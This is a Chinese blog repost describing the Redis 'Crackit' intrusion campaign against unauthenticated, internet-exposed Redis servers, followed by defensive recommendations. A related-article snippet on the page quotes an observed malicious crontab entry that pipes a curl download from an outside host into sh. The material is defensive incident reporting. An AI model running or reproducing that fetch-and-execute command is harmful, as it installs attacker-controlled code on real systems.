Redis Crackit事件发人深思

最新推荐文章于 2024-05-07 09:18:43 发布
最新推荐文章于 2024-05-07 09:18:43 发布
阅读量330 收藏
点赞数
文章标签: redis 漏洞 安全

据白帽汇安全团队分析,近日已发现不知名团体利用redis世界缺陷针对全球互联网的全网性入侵事件,如果您的linux服务器上运行的redis没有设置密码,很可能已经受到了此次安全事件影响,其最终结果将导致:redis数据丢失,服务器的ssh公钥被替换。
Redis_CrackIT_Statistics
很多使用者都是把redis下载到服务器直接运行使用,无ACL,无密码,root权限直接运行,且绑定在0.0.0.0:6379,暴露在公网上,攻击者在未授权访问Redis的情况下通过redis的机制,可以将自己的公钥或者其他恶意程序写入目标服务器中,从而可以直接控制目标服务器,本次攻击事件已经影响至少万余家服务器,redis官网并未对此提供补丁,到目前为止看到的该入侵事件利用的漏洞是:基于redis提供的正常服务功能,而且这一问题早在去年九月就作为远程代码执行RCE的技术问题做了公开发布,但只得到小范围传播。
Redis-CrackIT
分析发现,容易遭受攻击的环境是用户自建且运行Redis服务的Linux主机,并在公网上开放了Redis的6379端口,当然预防措施还是有的

  1. 以非 root 权限启动 Redis
  2. 增加 Redis 密码验证
  3. 禁止公网开放 Redis 端口, 例如可以在防火墙上禁用Redis的6379端口
  4. 检查 authorized_keys 是否非法

本文转载自:http://www.linuxprobe.com/redis-crackit-events-provide-thinking/

免费提供最新Linux技术教程书籍,为开源技术爱好者努力做得更多更好:http://www.linuxprobe.com/


linux_shuai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis事件驱动模型示例详解
01-19
Redis 是一个事件驱动的内存数据库,服务器需要处理两种类型的事件。 文件事件 时间事件 下面就会介绍这两种事件的实现原理。 文件事件 Redis 服务器通过 socket 实现与客户端(或其他redis服务器)的交互,文件...
Redis crackit 漏洞尝试
weixin_33816946的博客
11-28 88
最近爆出来的 Redis crackit 漏洞一直沸沸扬扬,趁着周末的时间研究了一下。研究之余不免感叹,这个漏洞简单粗暴,甚至可以说没有任何技术含量,却能对全球网络造成瘫痪之势,一夜之间几万台服务器接连沦陷。纵观这个漏洞的各个关键点,几乎都是由于配置疏忽导致的,可见运维同学还是任重而道远啊。 一、准备工作 网络入侵是违法行为,请在虚拟环境...
Redis CrackIT入侵事件分析
Shawn
05-10 1396
1 摘要 2015年11月10日中午12点左右,我们发现了某不知名团体利用redis设计缺陷,针对国内互联网进行了全网性的入侵事件。这次大规模的攻击事件主要针对Linux服务器,如果redis服务器使用root权限启动,并且没有配置认证,就可能能够导致redis数据丢失,服务器被添加账号用于ssh远程登录。 经过白帽汇安全团队的进一步分析,此次攻击事件已经导致至少10000家暴露red
Redis_Crackit漏洞介绍
幸福诗歌的博客
01-28 1386
2015年11月10日,有网络安全厂商指出国内互联网产生了大量针对Redis数据库服务器的扫描流量,其中有不少Redis服务器的数据库被清空,且/root/.ssh/authorized_keys文件被创建或改写,入侵者可以获取受影响服务器的完全控制权限。因为受影响的Redis服务器的数据库被清空,但留存有一条键名为crackit的记录,因此这次事件被命名为Redis Crackit入侵事件。 ...
redis crackit入侵事件总结
Lvnux的专栏
07-01 5193
今天发现服务器有异常进程/opt/yam/yam,上网搜了搜,是由于redis未授权引起的入侵,查了些资料,这里坐下总结。 1. 现象 有以下其一现象就要注意是否被入侵 crontab -l 可以看到类似“/15 * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh”。 ps -ef 可以看到进程 “/opt/yam
redis crackit 漏洞 过程还原
刀刀的专栏
04-19 7319
1.在两台测试机器上分别安装reids,一台作为发起攻击的机器(可以使用本地redis-cli登录远程redis-server),一台作为被攻击的机器(运行有redis-server)。 [root@test-hadoop-s1 ~]# yum install redis -y [root@test-hadoop-s2 ~]# yum install redis -y2.修改test-hadoop
redis过期事件监听
细节打败一切
08-01 5791
4.redis基础服务继承KeyExpirationEventMessageListener类注入自己的接口获取实现类方法通过自定义注解中的key与redis过期key匹配来控制每个key过期调用不同方法。将notify-keyspace-events“”修改为notify-keyspace-events“Ex”3.在redis基础服务定义自定义注解来控制业务方法监听的rediskey。注redis过期监听不像mq有保证不推荐用来弄需要有保证的业务。......
Redis系列—Redis事件订阅
此博客已停用,博文会逐渐转移到新地址,http://blog.csdn.net/liupeifeng3514
08-17 9864
Redis从2.X版本开始,就支持一种基于非持久化消息的、使用发布/订阅模式实现的事件通知机制。所谓基于非连接保持,是因为一旦消息订阅者由于各种异常情况而被迫断开连接,在其重新连接后,其离线期间的事件是无法被重新通知的(一些redis资料中也称为即发即弃)。而其使用的发布/订阅模式,意味着其机制并不是由订阅者周期性的从Redis服务拉取事件通知,而是由Redis服务主动推送事件通知到符合条件的若干订
springBoot监听redis失效key事件
zwrlj527的专栏
03-28 6790
序: 这次遇到的场景是需要对redis的失效key比对判断,增加电业务逻辑。 废话不多说,直接说重点,我也赶着回家呢。 redis配置文件修改,我是win系统。这个是对redis版本有要求的,所以先查看版本信息。 查看redis版本信息,redis安装目录下,黑框框(你懂的)下运行redis-cli.exe,然后再输入info 这个实...
提取redis事件机制源码为我所用
09-06
redis源码中事件机制部分提取出来了简单的整合修改成独立模块,应用到我们自己的项目中。并以一个简单的实例说明如何使用。
redis异步事件说明11
08-08
事件队列CPU网络1-req2-req3-req 1-execdruration 11-rep2-execdruration 22-execdruration
Redis事件驱动结构图
11-27
Redis 事件 服务器 客户端 交互
Redis 实战之压缩列表
奔走的蚂蚁的博客
05-04 953
压缩列表是一种为节约内存而开发的顺序型数据结构。压缩列表被用作列表键和哈希键的底层实现之一。压缩列表可以包含多个节点,每个节点可以保存一个字节数组或者整数值。添加新节点到压缩列表, 或者从压缩列表中删除节点, 可能会引发连锁更新操作, 但这种操作出现的几率并不高。
Redis 实战之对象
奔走的蚂蚁的博客
05-04 1072
Redis 数据库中的每个键值对的键和值都是一个对象。Redis 共有字符串、列表、哈希、集合、有序集合五种类型的对象, 每种类型的对象至少都有两种或以上的编码方式, 不同的编码可以在不同的使用场景上优化对象的使用效率。服务器在执行某些命令之前, 会先检查给定键的类型能否执行指定的命令, 而检查一个键的类型就是检查键的值对象的类型。Redis 的对象系统带有引用计数实现的内存回收机制, 当一个对象不再被使用时, 该对象所占用的内存就会被自动释放。Redis 会共享值为 0 到 9999 的字符串对象。
Redis 实战之命令请求的执行过程
最新发布
奔走的蚂蚁的博客
05-07 496
一个命令请求从发送到完成主要包括以下步骤: 1. 客户端将命令请求发送给服务器;2. 服务器读取命令请求,并分析出命令参数;3. 命令执行器根据参数查找命令的实现函数,然后执行实现函数并得出命令回复;4. 服务器将命令回复返回给客户端。serverCron 函数默认每隔 100 毫秒执行一次, 它的工作主要包括更新服务器状态信息, 处理服务器接收的 SIGTERM 信号, 管理客户端资源和数据库状态, 检查并执行持久化操作, 等等。
Redis:三种启动方式
一些平时在开发过程中遇到的常见问题,分享给大家
05-01 745
Redis:三种启动方式
redis之地理空间GEO
qq_63214872的博客
05-02 393
redis之地理空间GEO
redisson分布式锁中waittime的设置
qq_37831759的博客
05-06 228
之前分布式锁中使用redisson的lock.tryLock(0,0,TimeUnit.SECONDS)这里的time直接就取的传入的waitTime,当time减少到小于0时,返回加锁失败!这么的逻辑是releaseTime设置为0,实际上会使用默认的30s并触发看门狗机制。所以waitTime是没有什么默认值的,这么写相当于加锁失败立刻返回。设置为0实际会等待多少时间?实验一下,先加一个不会过期的锁,然后另一个线程试图获取锁。如果设置为0,在尝试获取不到锁后立刻就会返回失败。
redis 缓存一致性,缓存穿透,缓存雪崩,缓存击穿
dxh9231028的博客
05-04 868
1.缓存一致性:缓存一致性就是通过各种方法保证缓存与数据库信息一种,其中最多的办法就是想尽一切办法对过期key进行清除,以保证redis和数据库信息一只,其中就包括了中提到的内存淘汰策略,过期key的清除等等,当然也包括在代码中进行手动清除过期key,不过手动清除时需要注意要保证数据库的更新和redis的清除都成功完成,可以使用的方法包括,使用事务,使用相关服务将redis和数据库进行整合,或者只操作redis,再由redis操作数据库等等。
redis 监听删除事件
06-09
要监听 Redis 的删除事件,可以使用 Redis 的 Keyspace Notification 功能。具体实现步骤如下: 1. 在 Redis 配置文件中开启 Keyspace Notification 功能,设置 notify-keyspace-events 选项为 "Kd",其中 "K" 表示...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值